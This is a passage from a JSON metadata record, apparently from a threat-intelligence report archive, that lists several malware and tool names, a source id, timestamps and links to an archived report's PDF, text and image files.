"ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434513, "ts_updated_at": 1775826731, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/51123e82cb5de63c9bbba25e92276c0a26276a3e.pdf", "text": "https://archive.orkl.eu/51123e82cb5de63c9bbba25e92276c0a26276a3e.txt", "img": "https://archive.orkl.eu/51123e82cb5de63c9bbba25e92276c0a26276a3e.jpg" } }